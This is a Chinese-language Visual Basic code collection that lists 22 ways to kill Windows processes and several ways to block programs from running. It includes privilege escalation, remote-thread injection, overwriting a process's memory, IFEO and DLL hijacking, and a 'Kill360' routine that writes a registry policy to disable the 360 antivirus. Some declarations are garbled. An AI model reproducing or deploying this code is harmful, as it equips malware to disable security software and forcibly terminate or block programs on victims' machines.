Windows下杀进程22种方法:
'1.结束进程 (参数:进程ID)
Sub KillProcess(ByVal dwProcessId As Long)
SetDebug '提权
Dim hProcess As Long
'方法1,使用普通API
hProcess = OpenProcess(PROCESS_TERMINATE,False, dwProcessId)
If hProcess <> 0 Then
TerminateProcess hProcess, 0&
CloseHandle hProcess
End If
'方法2,使用内核API
Dimoa As OBJECT_ATTRIBUTES
Dimcid As CLIENT_ID
Dim ntStatus AsLong
oa.Length = Len(oa)
cid.UniqueProcess = dwProcessId
ntStatus = ZwOpenProcess(hProcess,PROCESS_TERMINATE, oa, cid)
If ntStatus >= 0 Then
ZwTerminateProcess hProcess, 0&
ZwClose hProcess
End If
'方法3
'dwProcessId = dwProcessId + 1
End Sub
'2.结束线程 (参数:线程ID)
SubKillThread(ByVal dwThreadId As Long)
SetDebug '提权
Dim hThread As Long
'方法1,使用普通API
hThread =OpenThread(THREAD_TERMINATE, False, dwThreadId)
If hThread <> 0 Then
TerminateThread hThread, 0&
CloseHandle hThread
End If
'方法2,使用内核API
Dimoa As OBJECT_ATTRIBUTES
Dimcid As CLIENT_ID
Dim ntStatus AsLong
oa.Length = Len(oa)
cid.UniqueThread = dwThreadId
ntStatus = ZwOpenThread(hThread,THREAD_TERMINATE, oa, cid)
If ntStatus >= 0 Then
ZwTerminateThread hThread, 0&
ZwClose hThread
End If
End Sub
'3.结束作业对象 (参数:进程ID)
PublicFunction KillJob(ByVal dwProcessId As Long) As Boolean
Dim hProcess AsLong
DimhJob As Long
Dim ntStatus AsLong
Dimoa As OBJECT_ATTRIBUTES
oa.Length = Len(oa)
ntStatus = ZwCreateJobObject(ByValVarPtr(hJob), JOB_OBJECT_ALL_ACCESS, oa)
If ntStatus >= 0 Then
hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, dwProcessId)
If hProcess <> 0 Then
ntStatus = ZwAssignProcessToJobObject(hJob, hProcess)
If (ntStatus >= 0) Then
KillJob = ZwTerminateJobObject(hJob, 0&) >= 0
End If
ZwClose hProcess
End If
ZwClose hJob
End If
End Function
'4.注入退出进程
PublicFunction MyExitProcess(ByVal dwProcessId As Long) As Boolean
Dim hProcess As Long, hThread AsLong, lngRet As Long, pThread As Long
hProcess = OpenProcess(PROCESS_ALL_ACCESS,False, dwProcessId)
If hProcess <> 0 Then
pThread = GetProcAddress(GetModuleHandleA("kernel32"),"ExitProcess")
hThread = CreateRemoteThread(hProcess, ByVal 0&, 0&, ByVal pThread,ByVal 0&, 0, 0&)
If hThread <> 0 Then
WaitForSingleObject hThread, INFINITE
GetExitCodeThread hThread, lngRet
MyExitProcess = lngRet
ZwClose hThread
End If
ZwClose hProcess
End If
End Function
'5.破坏进程内存
SubClearProcessMemory(ByVal dwProcessId As Long)
hProcess =OpenProcess(PROCESS_ALL_ACCESS, False, dwProcessId)
If hProcess Then
Dim i As Long
Dim dwWritten As Long
Dim bytArray() As Byte
ReDim bytArray(0 To 4095)
For i = &H10000 To &H7FFFFFFF - &H10000 Step &H1000
Call WriteProcessMemory(hProcess, ByVal i, VarPtr(bytArray(0)), &H1000,dwWritten)
Next
Erase bytArray
ZwClose hProcess
End If
End Sub
'6.结束任务 (参数:窗口句柄)
SubKillTask(ByVal m_hWnd As Long)
EndTask m_hWnd, False, True
End Sub
'7.停止服务 (参数:服务名称)
PublicFunction StopSvc(strServiceName As String) As Boolean
Dim scHandle AsLong
Dim svcHandle As Long
scHandle =OpenSCManager(vbNullString, vbNullString, SC_MANAGER_ENUMERATE_SERVICE)
svcHandle = OpenService(scHandle,strServiceName, SERVICE_WIN32_SHARE_PROCESS)
StopSvc = ControlService(svcHandle,SERVICE_CONTROL_STOP, 0&)
CloseServiceHandle (svcHandle)
CloseServiceHandle (scHandle)
End Function
'8.WM_CLOSE 关闭窗口 (参数:窗口句柄)
SubCloseWnd(ByVal m_hWnd As Long)
PostMessage m_hWnd, WM_CLOSE, 0, 0
End Sub
'9.WM_SYSCOMMAND (发送系统菜单命令)
SubCloseWnd_SysCommand(ByVal m_hWnd As Long)
PostMessage m_hWnd, WM_SYSCOMMAND,SC_CLOSE, 0
End Sub
'10.WM_NCLBUTTONDBLCLK (点击系统菜单)
SubCloseWnd_NCLDBK(ByVal m_hWnd As Long)
PostMessage m_hWnd,WM_NCLBUTTONDBLCLK, HTSYSMENU, 0
End Sub
'11.发送Alt+F4
SubSendAltF4(ByVal m_hWnd As Long)
SetForegroundWindow m_hWnd
DoEvents
PostMessage m_hWnd, WM_SYSKEYDOWN,vbKeyF4, &H203E0001
PostMessage m_hWnd, WM_SYSKEYUP,vbKeyF4, &H203E0001
End Sub
'12.模拟Alt+F4,对隐藏窗口也有效
SubKeyPressAltF4(ByVal m_hWnd As Long)
SetForegroundWindow m_hWnd
DoEvents
'方法一
keybd_event vbKeyMenu, 0, 0, 0
keybd_event vbKeyF4, 0, 0, 0
keybd_event vbKeyF4, 0,KEYEVENTF_KEYUP, 0
keybd_event vbKeyMenu, 0,KEYEVENTF_KEYUP, 0
'方法二
m_SendInputAltF4
End Sub
'13.模拟Alt+空格+C
SubKeyPressAltSpaceC(ByVal m_hWnd As Long)
SetForegroundWindow m_hWnd
DoEvents
keybd_event vbKeyMenu, 0, 0, 0
keybd_event vbKeySpace, 0, 0, 0
keybd_event vbKeySpace, 0,KEYEVENTF_KEYUP, 0
keybd_event vbKeyMenu, 0,KEYEVENTF_KEYUP, 0
keybd_event vbKeyC, 0, 0, 0
keybd_event vbKeyC, 0,KEYEVENTF_KEYUP, 0
End Sub
'14.模拟单击关闭按钮/双击系统菜单
SubMouseClickClose(ByVal m_hWnd As Long)
DimlStyle As Long
Dim CXBorder AsLong
Dim CYBorder AsLong
Dim CYCaption As Long
Dimx As Long
Dimy As Long
DimptOld As POINTAPI
DimlRect As RECT
Dim RTLStyle AsBoolean
'计算标准窗口非客户区边框
lStyle = GetWindowLong(m_hWnd,GWL_STYLE)
If lStyle And WS_THICKFRAME Then
CXBorder = GetSystemMetrics(SM_CXFRAME) \ 2
CYBorder = GetSystemMetrics(SM_CYFRAME) \ 2
Else
CXBorder = GetSystemMetrics(SM_CXDLGFRAME)
CYBorder = GetSystemMetrics(SM_CYDLGFRAME)
End If
CYCaption = GetSystemMetrics(SM_CYCAPTION)'标题栏高度
lStyle = lStyle And Not WS_DISABLEDOr WS_SYSMENU Or WS_CAPTION '使之有效且拥有系统菜单
Call SetWindowLong(m_hWnd,GWL_STYLE, lStyle)
Call SetWindowPos(m_hWnd,HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE Or SWP_SHOWWINDOW) '设为顶层且可视
Call GetWindowRect(m_hWnd, lRect)
lStyle = GetWindowLong(m_hWnd,GWL_EXSTYLE)
RTLStyle = lStyle AndWS_EX_LAYOUTRTL '是否是镜子窗口
'****************** 方法一 单击关闭 ********************
If Not RTLStyle Then
x = lRect.Right - (CXBorder + CYCaption \ 2)
y = lRect.Top + (CYBorder + CYCaption \ 2)
Else
x = lRect.Left + (CXBorder + CYCaption \ 2)
y = lRect.Top + (CYBorder + CYCaption \ 2)
End If
Call GetCursorPos(ptOld) '原坐标
Call SetCursorPos(x, y)
'方法(1)keybd_event
Callmouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
Call mouse_event(MOUSEEVENTF_LEFTUP,0, 0, 0, 0)
'方法(2)SendInput
m_MouseClick
Call SetCursorPos(ptOld.x,ptOld.y) '恢复坐标
'****************** 方法二 双击系统菜单 ******************
If RTLStyle Then
x = lRect.Right - (CXBorder + CYCaption \ 2)
y = lRect.Top + (CYBorder + CYCaption \ 2)
Else
x = lRect.Left + (CXBorder + CYCaption \ 2)
y = lRect.Top + (CYBorder + CYCaption \ 2)
End If
Call GetCursorPos(ptOld) '原坐标
Call SetCursorPos(x, y)
'方法(1)keybd_event
Callmouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
Call mouse_event(MOUSEEVENTF_LEFTUP,0, 0, 0, 0)
Callmouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
Call mouse_event(MOUSEEVENTF_LEFTUP,0, 0, 0, 0)
'方法(2)SendInput
Call m_MouseClick
Call m_MouseClick
Call SetCursorPos(ptOld.x,ptOld.y) '恢复坐标
End Sub
'15.销毁窗口(WM_DESTROY/WM_NCDESTROY)
SubDestroyWnd(ByVal m_hWnd As Long)
'方法一,销毁客户区
Call PostMessage(m_hWnd, WM_DESTROY,0, 0)
'方法二,销毁非客户区,需执行两次
Call PostMessage(m_hWnd,WM_NCDESTROY, 0, 0)
Call PostMessage(m_hWnd,WM_NCDESTROY, 0, 0)
End Sub
'16.退出窗口
SubQuitWnd(ByVal m_hWnd As Long)
Call PostMessage(m_hWnd, WM_QUIT, 0,0)
End Sub
'17.退出线程 参数:线程ID或窗口句柄
SubQuitThread(ByVal m_ID As Long, Optional ByVal IshWnd As Boolean)
If IshWnd Then m_ID =GetWindowThreadProcessId(m_ID, 0&)
Call PostThreadMessage(m_ID,WM_QUIT, 0, 0)
End Sub
'18.SetParent
Sub SetParentHwnd(ByVal m_hWnd As Long)
Dim hParent As Long
hParent = CreateWindowEx(0,"#32770", "yuanfang235", 0, 0, 0, 0, 0, 0, 0, 0, ByVal0&) '创建一个临时窗口
If hParent <> 0 Then
m_hWnd = GetAncestor(m_hWnd, GA_ROOT) '根窗口
SetParent m_hWnd, hParent '将其俘虏
DestroyWindow hParent '自杀
End If
End Sub
'19.发送垃圾消息
SubSendMsg(ByVal m_hWnd As Long)
Dim i&
For i = 1 To 1000
PostMessage m_hWnd, i, 0, 0
Next i
End Sub
'20.散布虚假退出系统消息
SubSendShutDown()
CallSetProcessShutdownParameters(&H0&, 0&) '调整本进程为最后退出
ExitWindowsEx 0, 0 '注销系统
'在子类中吃掉WM_QUERYENDSESSION与WM_ENDSESSION,从而迫使所有用户进程退出
End Sub
'21.卸载法
SubUninstallApp()
'读取注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*\UninstallString]下的值,获取目标程序的卸载程序路径,运行并模拟消息使其自动卸载。
End Sub
'22.调试法
SubDebugProcess(ByVal dwProcessId As Long)
DebugActiveProcess dwProcessId
End '退出,和它同归于尽,然后重新运行或另开一实例
End Sub
'*************************************************************************
封进程的几种方法
'1.Shell
'路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
'2.IFEO
'路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image FileExecution Options\*\Debugger
'3.manifest
'在目标程序目录下建一文件夹,名为*.exe.Manifest 适合WinXP
'4.DLL劫持
'比如VB的msvbvm60.dll,网络组件ws2_32.dll等,对于打过补丁的系统无效
'5.权限
'适合NTFS分区,可借助cacls.exe命令来改变权限
'例子:禁止访问记事本
Sub DisNotepad()
Shell "cacls c:\windows\system32\notepad.exe/e /d everyone", vbHide
End Sub
'6.软件限制策略
'//以干掉360为例,之前在百度上写过,360或许早已经发现该文,所以...
Public Function Kill360() As Boolean
Dim hKey As Long
Dim lRet As Long
Dim strFileName As String
Dim bytData(0 To 7) As Byte
strFileName ="360tray.exe" '360的文件名,这里以路径规则举例
lRet =RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{487462c2-2064-4e1f-aeae-20b7095a41bb}",hKey)
If lRet = 0 Then
lRet = RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByValvbNullString, 0)
lRet = RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByValstrFileName, lstrlen(strFileName))
lRet = RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD,bytData(0), 8)
lRet = RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, 0, 4)
RegCloseKey hKey
Kill360 = (lRet = 0)
End If
End Function
'*********************************其它过程****************************************
'SendInput 鼠标单击
Private Sub m_MouseClick()
Dim GInput(1) As PINPUT
Dim MInput(1) As MOUSEINPUT
GInput(0).IType = INPUT_MOUSE
GInput(1).IType = INPUT_MOUSE
With MInput(0)
.dx = 0
.dy = 0
.dwFlags = MOUSEEVENTF_LEFTDOWN
.time = GetMessageTime()
.dwExtraInfo = GetMessageExtraInfo()
End With
With MInput(1)
.dx = 0
.dy = 0
.dwFlags = MOUSEEVENTF_LEFTUP
.time = GetMessageTime()
.dwExtraInfo = GetMessageExtraInfo()
End With
CopyMemory GInput(0).ki(0),MInput(0), Len(MInput(0))
CopyMemory GInput(1).ki(0),MInput(1), Len(MInput(1))
SendInput 2, GInput(0),Len(GInput(0))
Erase GInput, MInput
End Sub
'SendInputAlt+F4
Private Sub m_SendInputAltF4()
Dim GInput(3) As PINPUT
Dim KInput(3) As KEYBDINPUT
GInput(0).IType = INPUT_KEYBOARD
GInput(1).IType = INPUT_KEYBOARD
GInput(2).IType = INPUT_KEYBOARD
GInput(3).IType = INPUT_KEYBOARD
KInput(0).wVk =vbKeyMenu 'Alt
KInput(1).wVk =vbKeyF4 'F4
KInput(2).wVk = vbKeyF4
KInput(3).wVk = vbKeyMenu
KInput(2).dwFlags = KEYEVENTF_KEYUP
KInput(3).dwFlags = KEYEVENTF_KEYUP
CopyMemory GInput(0).ki(0),KInput(0), Len(KInput(0))
CopyMemory GInput(1).ki(0),KInput(1), Len(KInput(1))
CopyMemory GInput(2).ki(0),KInput(2), Len(KInput(2))
CopyMemory GInput(3).ki(0),KInput(3), Len(KInput(3))
SendInput 4, GInput(0),Len(GInput(0))
Erase GInput, KInput
Sleep 100
keybd_event vbKeyMenu, 0,KEYEVENTF_KEYUP, 0 '释放Alt,(SendInput无法释放Alt?)
End Sub
'提权
Private Function SetDebug() As Boolean
SetDebug =(RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, 0) >= 0)
End Function
'以下是API声明:
Option Explicit
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory AsLong
ObjectName As Long
Attributes As Long
SecurityDescriptor As Long
SecurityQualityOfService As Long
End Type
Private Type CLIENT_ID
UniqueProcess AsLong
UniqueThread As Long
End Type
Private Type POINTAPI
x As Long
y As Long
End Type
Private Type RECT
Left As Long
Top AsLong
Right As Long
Bottom As Long
End Type
Private Type MOUSEINPUT
dx As Long
dy As Long
mouseData As Long
dwFlags As Long
time As Long
dwExtraInfo As Long
End Type
Private TypeKEYBDINPUT
wVk As Long
wScan As Long
dwFlags As Long
time As Long
dwExtraInfo As Long
End Type
Private TypePINPUT
IType As Long
ki(0 To 23) As Byte
End Type
Private Declare Sub CopyMemory Lib "kernel32" Alias"RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long,ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfoAs Long)
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte,ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds AsLong)
Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" (ByValPrivilege&, ByVal NewValue&, ByVal NewThread&, OldValue&) AsLong
Private Declare Function OpenProcess Lib "kernel32" (ByValdwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId AsLong) As Long
Private Declare Function OpenThread Lib "kernel32.dll" (ByValdwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId AsLong) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject AsLong) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByValhProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function TerminateThread Lib "kernel32" (ByValhThread As Long, ByVal dwExitCode As Long) As Long
Private Declare Function ZwClose Lib "ntdll.dll" (ByVal ObjectHandleAs Long) As Long
Private Declare Function ZwTerminateProcess Lib "v" (ByVal hProcessAs Long, ByVal uExitCode As Long) As Long
Private Declare Function ZwTerminateThread Lib "ntdll.dll" (ByValhThread As Long, ByVal dwExitCode As Long) As Long
Private Declare Function ZwCreateJobObject Lib "ntdll.dll" (ByValhJob As Long, ByVal dwAccess As Long, oa As OBJECT_ATTRIBUTES) As Long
Private Declare Function ZwAssignProcessToJobObject Lib "ntdll.dll"(ByVal hJob As Long, ByVal hProcess As Long) As Long
Private Declare Function ZwTerminateJobObject Lib "ntdll.dll" (ByValhJob As Long, ByVal ExitStatus As Long) As Long
Private Declare Function ZwOpenProcess Lib "ntdll.dll" (ByRefProcessHandle As Long, ByVal AccessMask As Long, ByRef ObjectAttributes AsOBJECT_ATTRIBUTES, ByRef ClientID As CLIENT_ID) As Long
Private Declare Function ZwOpenThread Lib "ntdll.dll" (ByRefThreadHandle As Long, ByVal AccessMask As Long, ByRef ObjectAttributes AsOBJECT_ATTRIBUTES, ByRef ClientID As CLIENT_ID) As Long
Private Declare Function GetModuleHandleA Lib "kernel32" (ByVallpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModuleAs Long, ByVal lpProcName As String) As Long
Private Declare Function GetExitCodeThread Lib "kernel32" (ByValhThread As Long, lpExitCode As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByValhHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByValhProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long,lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long,lpThreadId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByValhProcess As Long, lpBaseAddress As Any, lpBuffer As Long, ByVal nSize As Long,lpNumberOfBytesWritten As Long) As Long
Private Declare Function EndTask Lib "user32" (ByVal hwnd As Long,ByVal bShutDown As Boolean, ByVal bForce As Boolean) As Long
Private Declare Function OpenSCManager Lib "advapi32.dll" Alias"OpenSCManagerA" (ByVal strMachineName As String, ByVal strDBName AsString, ByVal lAccessReq As Long) As Long
Private Declare Function OpenService Lib "advapi32.dll" Alias"OpenServiceA" (ByVal hSCManager As Long, ByVal strServiceName AsString, ByVal lAccessReq As Long) As Long
Private Declare Function ControlService Lib "advapi32.dll" (ByValhService As Long, ByVal lControlCode As Long, lpServiceStatus As Long) AsBoolean
Private Declare Function CloseServiceHandle Lib "advapi32.dll" (ByValhHandle As Long) As Boolean
Private Declare Function PostMessage Lib "user32" Alias"PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParamAs Long, ByVal lParam As Long) As Long
Private Declare Function SetForegroundWindow Lib "user32" (ByVal hwndAs Long) As Long
Private Declare Function GetSystemMetrics Lib "user32" (ByVal nIndexAs Long) As Long
Private Declare Function GetWindowLong Lib "user32" Alias"GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias"SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByValdwNewLong As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long,ByVal nCmdShow As Long) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd AsLong, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cxAs Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function GetCursorPos Lib "user32" (lpPoint AsPOINTAPI) As Long
Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long,ByVal y As Long) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd AsLong, lpRect As RECT) As Long
Private Declare Function SendInput Lib "user32.dll" (ByVal cInputs AsLong, ByRef pInputs As PINPUT, ByVal cbSize As Long) As Long
Private Declare Function GetMessageTime Lib "user32" () As Long
Private Declare Function GetMessageExtraInfo Lib "user32" () As Long
Private Declare Function PostThreadMessage Lib "user32" Alias"PostThreadMessageA" (ByVal idThread As Long, ByVal msg As Long,ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByValhwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd AsLong) As Long
Private Declare Function CreateWindowEx Lib "user32" Alias"CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName AsString, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long,ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParentAs Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild AsLong, ByVal hWndNewParent As Long) As Long
Private Declare Function GetAncestor Lib "user32.dll" (ByVal hwnd AsLong, ByVal gaFlags As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags AsLong, ByVal dwReserved As Long) As Long
Private Declare Function SetProcessShutdownParameters Lib "kernel32"(ByVal dwLevel As Long, ByVal dwFlags As Long) As Long
Private Declare Function DebugActiveProcess Lib "kernel32" (ByValdwProcessId As Long) As Long
Private Const SE_DEBUG_PRIVILEGE = 20 '调试权
Private Const PROCESS_TERMINATE = (&H1)
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Const PROCESS_CREATE_THREAD = (&H2)
Private Const JOB_OBJECT_ALL_ACCESS = &H1F001F
Private Const THREAD_TERMINATE = (&H1)
Private Const INFINITE = &HFFFFFFFF
Private Const SERVICE_CONTROL_STOP = &H1
Private Const SC_MANAGER_ENUMERATE_SERVICE = &H4
Private Const SERVICE_WIN32_SHARE_PROCESS As Long = &H20
Private Const WM_CLOSE = &H10
Private Const WM_SYSCOMMAND = &H112
Private Const WM_NCLBUTTONDBLCLK = &HA3
Private Const WM_KEYDOWN = &H100
Private Const WM_KEYUP = &H101
Private Const WM_SYSKEYDOWN = &H104
Private Const WM_SYSKEYUP = &H105
Private Const WM_DESTROY = &H2
Private Const WM_NCDESTROY = &H82
Private Const WM_QUIT = &H12
Private Const SC_CLOSE = &HF060&
Private Const HTSYSMENU = 3
Private Const SM_CXDLGFRAME = 7
Private Const SM_CYDLGFRAME = 8
Private Const SM_CXFRAME = 32
Private Const SM_CYFRAME = 33
Private Const SM_CYCAPTION = 4
Private Const GWL_STYLE = (-16)
Private Const GWL_EXSTYLE = (-20)
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
Private Const WS_THICKFRAME = &H40000
Private Const WS_DISABLED = &H8000000
Private Const WS_EX_LAYOUTRTL = &H400000
Private Const SWP_NOMOVE = &H2
Private Const SWP_NOSIZE = &H1
Private Const SWP_SHOWWINDOW = &H40
Private Const HWND_TOPMOST = -1
Private Const MOUSEEVENTF_LEFTDOWN = &H2
Private Const MOUSEEVENTF_LEFTUP = &H4
Private Const KEYEVENTF_KEYUP = &H2
Private ConstINPUT_MOUSE = 0
Private Const INPUT_KEYBOARD = 1
Private Const INPUT_HARDWARE = 2
Private Const GA_ROOT = 2
'********************* 完 *********************
